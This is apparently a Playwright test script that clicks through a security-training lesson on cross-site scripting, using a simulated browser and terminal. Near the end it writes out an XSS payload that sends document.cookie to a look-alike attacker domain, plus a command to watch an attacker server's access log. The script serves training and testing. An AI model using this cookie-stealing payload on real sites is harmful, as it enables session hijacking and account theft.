import { test, expect } from '@playwright/test';

test('test', async ({ page }) => {
  test.slow();
  await page.goto('https://testaug3.application.security/user/profile');
  await page.getByPlaceholder('E-Mail').click();
  await page.getByPlaceholder('E-Mail').fill('test736783267@yopmail.com');
  await page.getByPlaceholder('Password').click();
  await page.getByPlaceholder('Password').fill('Tftus@123');
  await page.getByRole('button', { name: 'Log In' }).click();
  await page.getByText('JavaScript', { exact: true }).click();
  await page.getByRole('button', { name: 'Start Learning' }).click();
  await page.getByRole('button', { name: 'Next' }).click();
  await page.getByText('COPY').click();
  await page.locator('#js-fake-browser-link-area').click();
  await page.locator('#js-fake-browser-link-area span').nth(1).fill('https://www.compupoint.com/c/product/laptop_81lf0004us_core_i7_8750h_16gb');
  await page.locator('#js-browser-url-enter').click();
  await page.getByRole('button', { name: 'Next' }).click();
  await page.getByRole('button', { name: 'Analyze Code' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('img', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('img', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('img', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('button', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('button', { name: 'Next' }).click();
  await page.getByRole('img', { name: 'Laptop' }).click();
  await page.getByRole('button', { name: 'Next' }).click();
  await page.getByText('COPY').click();
  await page.locator('#js-fake-browser-link-area').getByRole('img').click();
  await page.locator('#js-fake-browser-link-area span').nth(3).fill(',<img src=x onerror=javascript:alert(\'hacked\')>/');
  page.once('dialog', dialog => {
    console.log(`Dialog message: ${dialog.message()}`);
    dialog.dismiss().catch(() => {});
  });
  await page.locator('#js-browser-url-enter').click();
  await page.waitForTimeout(2000);
  await page.getByRole('button', { name: 'Next' }).click();
  await page.waitForTimeout(2000);
  await page.getByRole('button', { name: 'Next' }).click();
  await page.getByText('COPY').click();
  await page.locator('pre').filter({ hasText: 'bob@193.112.33.32-hosting-linux:-#' }).click();
  await page.keyboard.type('service apache2 start && tail -f /var/log/access.log');
  await page.keyboard.press('Enter');
  await page.waitForTimeout(1000);
  await page.getByRole('img', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('img', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('button', { name: 'Next' }).click();
  await page.getByText('COPY').click();
  await page.locator('#js-fb-blinker-item').click();
  await page.locator('#js-fake-browser-link-area span').nth(1).fill('https://www.livemail.com');
  await page.locator('#js-browser-url-enter path').click();
  await page.getByText('Security Issue').click();
  await page.getByRole('button', { name: 'Next' }).click();
  await page.getByRole('link', { name: 'https://compupoint.com/c/product/laptop_81lf0004us_core_i7_8750h_16gb#prettyPhoto/0,<img src=x onerror=javascript:window.open(\'http://compu-point.com?cookie=\'+document.cookie)>/' }).click();
  await page.getByRole('button', { name: 'Next' }).click();
  await page.getByRole('button', { name: 'Analyze Output' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('img', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('img', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('button', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('button', { name: 'Next' }).click();
  await page.waitForTimeout(1000);
  await page.getByRole('button', { name: 'Finish' }).click();
  await page.getByRole('button', { name: '★' }).nth(4).click();
  await page.getByRole('button', { name: 'Submit' }).click();
});